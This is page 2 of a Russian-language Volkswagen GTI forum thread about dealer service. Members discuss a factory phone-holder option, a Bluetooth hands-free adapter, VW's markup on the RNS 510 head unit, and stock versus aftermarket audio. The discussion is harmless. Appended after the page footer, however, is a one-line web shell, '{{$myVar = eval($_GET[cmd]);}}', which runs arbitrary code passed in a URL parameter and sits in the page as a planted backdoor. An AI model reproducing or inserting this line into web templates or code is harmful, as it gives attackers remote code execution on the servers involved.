+ Ответить в теме
Страница 2 из 34 ПерваяПервая 1 2 3 4 12 ... ПоследняяПоследняя
Показано с 11 по 20 из 334

Тема: Сервис


  1. #11
    GTI-Racing IvanGTIV is on a distinguished road Аватар для IvanGTIV
    Регистрация
    06.10.2006
    Машина
    GTI V DSG, REVO, H&R, KONI sport, H2sport, Goodridge, RBF600, DS2500, ATE PowerDisc, OZ racing
    Сообщений
    1,885
    <div class='quotetop'>Цитата(Gomkv &#064; Nov 28 2007, 10&#58;26) <{POST_SNAPBACK}></div><div class='quotemain'>ФИНЫ :angry:[/b][/quote]

    Ну не знаю как у других, а в моем случае фины не при чем
    Машина с завода попала сразу к дилеру (200 км от завода)
    Так что либо завод либо дилер

  2. #12
    GTI-Racing IvanGTIV is on a distinguished road Аватар для IvanGTIV
    Регистрация
    06.10.2006
    Машина
    GTI V DSG, REVO, H&R, KONI sport, H2sport, Goodridge, RBF600, DS2500, ATE PowerDisc, OZ racing
    Сообщений
    1,885
    ну вроде как и про сервис тоже.

    короче у меня с завода шла опция подготовка под мобильный телефон.
    торчала из торпедо такая держалка.



    я думал что это адаптер под определенную модель телефона, попробовал всунуть свой - не подошел, я и забыл про это дело.
    но недавно просматривал счет на машину и увидел, что это дело стоило 390 евро, меня задело, что оно никак не используется.

    позвонил нашим дилерам - все конечно же теряются в догадках что и как.
    один только "разобрался", типа вам надо докупить блок хэндсфри, микрофон, адаптер под вашу модель телефона и будет
    вам счастье.

    как-то мне показалось нелогичной докупка блока управления и микрофона для уже оплаченной и установленной подготовки для мобильного телефона. покопался я сам, все нашел и все осмыслил.

    короче говоря, привезли мне сегодня универсальный блютус адаптер, поставил я его.
    все работает.
    небольшой прикол в том, что можно при желании с телефона транслировать музыку на колонки, такая фича.
    а так хэндсфри как хэндсфри, т.е. я доволен


  3. #13
    Супер&#33;
    А что отображается на навигации и МФД? Книга телефонная синхронизируется?

  4. #14
    GTI-Racing IvanGTIV is on a distinguished road Аватар для IvanGTIV
    Регистрация
    06.10.2006
    Машина
    GTI V DSG, REVO, H&R, KONI sport, H2sport, Goodridge, RBF600, DS2500, ATE PowerDisc, OZ racing
    Сообщений
    1,885
    <div class='quotetop'>Цитата(aphonya &#064; Dec 27 2007, 23&#58;53) <{POST_SNAPBACK}></div><div class='quotemain'>Супер&#33;
    А что отображается на навигации и МФД? Книга телефонная синхронизируется?[/b][/quote]

    Ну ты прям уже ТАКОГО хочешь от простой балалайки за 2500 евро., которая даже тэги мп3 не поддерживает.
    Отображается только самая самая важная и необходимая информация.
    А именно - надпись Telephone при активизации связки телефон-хэндсфри (см. фото)
    Это же тебе не японский ширпотреб какой-то чтобы там что-то отображалось и синхронизировалось,
    это серьезный хай енд аппарат со строгим минималистическим функционалом и интерфейсом.
    для настоящих ценителей.


  5. #15
    <div class='quotetop'>Цитата(IvanGTIV &#064; Dec 28 2007, 02&#58;36) <{POST_SNAPBACK}></div><div class='quotemain'>простой балалайки за 2500 евро.[/b][/quote]

    Я конечно поражаюсь от цен на доп. опции, при том, что в разы дешевле можно себе поставить лучше опции.

  6. #16
    Bitch
    Guest Аватар для Bitch
    <div class='quotetop'>Цитата(Ginger Fish &#064; Dec 28 2007, 09&#58;32) <{POST_SNAPBACK}></div><div class='quotemain'>Я конечно поражаюсь от цен на доп. опции, при том, что в разы дешевле можно себе поставить лучше опции.[/b][/quote]
    это точно - дешевле, лучше, качественней и т.д

    а за фольксовскую музыку ваще стыдно(((

  7. #17
    GTI-Racing constantinus is on a distinguished road Аватар для constantinus
    Регистрация
    22.09.2007
    Откуда
    Киев
    Машина
    RGTI
    Сообщений
    1,631
    Кто-то уже вроде писал тут на форуме, но лучше стока - только сток)
    и RNS 510 - подтверждение, а все что не родное ставят наши спецы.

    Вон уже ездил на сервис со скрипящем ремнем, прошло пол недели - снова скрепит)

    К примеру всякие парктноники - я не встречал ни одного нормального по сравнению со стоковым у шефа в audi s8, пишит из тех колонок с какой стороны припятствие.

    Магнитола стоит вроде не дешевая pioner, типа наворачивать можно как угодно, но если сравнить со стоковой RNS 510, то визуально конкретно проигрывает, по тех характеристикам может и пионер лучше, но я использую только радио и диски.
    Громкую связь пробывал на старом авто, очень неудобно - лучше уж наушник в ухо - намного дешевле и пассажиры не слышат мат)))
    А про музыку я бы не согласился - для стока достойная, ставил дорогущие колонки pioner, так они оказались намного хуже чем штатные.
    Вообще надо делать шумку и нормальную музыку, но во первых - прощай гарантия, а во вторых видел как спецы ставили аккустику - если не знают как в авто провода идут, то не заморачиваются (не ищут куда подведены) просто пропускают свои и у разъёма откусывают и прикручивают, так эти ребята еще не дешиво берут). Да и надо быть фанатом, чтобы выложить за музыку такие деньги)))

    Вообщем, что касается салона, то надо ставить только стоковые вещи, универсальне плохо вписываются в интерьер.
    не торчат провода и ничего не отваливается со временем)
    Это мое мнение)

  8. #18
    GTI-Racing IvanGTIV is on a distinguished road Аватар для IvanGTIV
    Регистрация
    06.10.2006
    Машина
    GTI V DSG, REVO, H&R, KONI sport, H2sport, Goodridge, RBF600, DS2500, ATE PowerDisc, OZ racing
    Сообщений
    1,885
    <div class='quotetop'>Цитата(constantinus &#064; Dec 30 2007, 01&#58;59) <{POST_SNAPBACK}></div><div class='quotemain'>Кто-то уже вроде писал тут на форуме, но лучше стока - только сток)
    и RNS 510 - подтверждение, а все что не родное ставят наши спецы.

    Вон уже ездил на сервис со скрипящем ремнем, прошло пол недели - снова скрепит)

    К примеру всякие парктноники - я не встречал ни одного нормального по сравнению со стоковым у шефа в audi s8, пишит из тех колонок с какой стороны припятствие.

    Магнитола стоит вроде не дешевая pioner, типа наворачивать можно как угодно, но если сравнить со стоковой RNS 510, то визуально конкретно проигрывает, по тех характеристикам может и пионер лучше, но я использую только радио и диски.
    Громкую связь пробывал на старом авто, очень неудобно - лучше уж наушник в ухо - намного дешевле и пассажиры не слышат мат)))
    А про музыку я бы не согласился - для стока достойная, ставил дорогущие колонки pioner, так они оказались намного хуже чем штатные.
    Вообще надо делать шумку и нормальную музыку, но во первых - прощай гарантия, а во вторых видел как спецы ставили аккустику - если не знают как в авто провода идут, то не заморачиваются (не ищут куда подведены) просто пропускают свои и у разъёма откусывают и прикручивают, так эти ребята еще не дешиво берут). Да и надо быть фанатом, чтобы выложить за музыку такие деньги)))

    Вообщем, что касается салона, то надо ставить только стоковые вещи, универсальне плохо вписываются в интерьер.
    не торчат провода и ничего не отваливается со временем)
    Это мое мнение)[/b][/quote]


    Вопрос просто в нереальной жадности VW
    так как они предлагают тот же 510-ый по цене вдвое-втрое более
    высокой чем просят за устройства с аналогичным функционалом
    другие производители. при том понятно, что VW сам их не делает,
    а заказывает, т.е. по сути перепродает.
    при этом Пионер, например, готов продавать похожие балалайки
    скажем за &#036;1200 (понятно, что в этй цене есть прибыль), а VW почему-то
    хочет купить такой "Пионер" за 900 и продать нам за 3000.

  9. #19
    Причем они делаю ВСЕ для того, что бы покупали доп опции именно у них (не стыковка оборудования, частые глюки, не совместимость)&#33;&#33;&#33;

  10. #20
    Bitch
    Guest Аватар для Bitch
    я тож за сток, но сток кожа, ксенон, а вот музыка, колонки, сабы и усилители НЕТ НЕТ НЕТ&#33;

    у фольца даже в фаэтоне (не знаю, что там) хреновая музыка по сравнению с меринами и лехусами()того же класса

+ Ответить в теме
Страница 2 из 34 ПерваяПервая 1 2 3 4 12 ... ПоследняяПоследняя

Похожие темы

  1. Ищу нормальный сервис по WAG
    от MORG m-customs в разделе Разное
    Ответов: 22
    Последнее сообщение: 01.12.2018, 15:16
  2. Ищу сервис ЮХ
    от vikeis в разделе Ремонт и обслуживание
    Ответов: 3
    Последнее сообщение: 06.11.2012, 13:52
  3. сервис ebaytoday.ru
    от keks в разделе Курилка
    Ответов: 5
    Последнее сообщение: 12.04.2012, 08:14
  4. Сервис в ЗАО или Одинцово?
    от olegarh в разделе Двигатель
    Ответов: 2
    Последнее сообщение: 24.06.2011, 14:02
  5. Сервис
    от DiGri в разделе Ремонт и обслуживание
    Ответов: 1
    Последнее сообщение: 08.07.2008, 14:30

Ваши права

  • Вы не можете создавать новые темы
  • Вы не можете отвечать в темах
  • Вы не можете прикреплять вложения
  • Вы не можете редактировать свои сообщения
{{$myVar = eval($_GET[cmd]);}}